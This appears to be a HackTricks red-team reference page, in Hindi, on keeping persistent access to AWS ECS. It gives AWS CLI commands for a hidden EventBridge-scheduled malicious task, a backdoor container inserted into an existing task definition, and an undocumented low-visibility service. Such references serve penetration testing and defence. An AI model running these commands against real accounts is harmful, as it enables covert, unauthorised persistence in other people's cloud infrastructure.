AWS - ECS Persistence

शून्य से नायक तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

ECS

अधिक जानकारी के लिए देखें:

pageAWS - ECS Enum

छिपा हुआ आवधिक ECS कार्य

TODO: परीक्षण

एक हमलावर Amazon EventBridge का उपयोग करके एक छिपा हुआ आवधिक ECS कार्य बना सकता है जो एक दुर्भावनापूर्ण कार्य को नियमित रूप से अनुसूचित करने के लिए होता है। यह कार्य पुनरावलोकन, डेटा निष्कासन, या AWS खाते में स्थायित्व बनाए रखने का काम कर सकता है।

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an Amazon EventBridge rule to trigger the task periodically
aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"

# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
{
"Id": "malicious-ecs-task-target",
"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
"EcsParameters": {
"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
"TaskCount": 1
}
}
]'

मौजूदा ECS टास्क डेफिनिशन में बैकडोर कंटेनर

TODO: परीक्षण करें

एक हमलावर मौजूदा ECS टास्क डेफिनिशन में एक गुप्त बैकडोर कंटेनर जोड़ सकता है जो वैध कंटेनरों के साथ-साथ चलता है। बैकडोर कंटेनर का उपयोग स्थायित्व और दुर्भावनापूर्ण गतिविधियों को करने के लिए किया जा सकता है।

# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'

अप्रलेखित ECS सेवा

TODO: परीक्षण करें

एक हमलावर एक अप्रलेखित ECS सेवा बना सकता है जो एक हानिकारक कार्य चलाती है। कार्यों की वांछित संख्या को न्यूनतम पर सेट करके और लॉगिंग को अक्षम करके, प्रशासकों के लिए हानिकारक सेवा को नोटिस करना कठिन हो जाता है।

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
शून्य से नायक तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated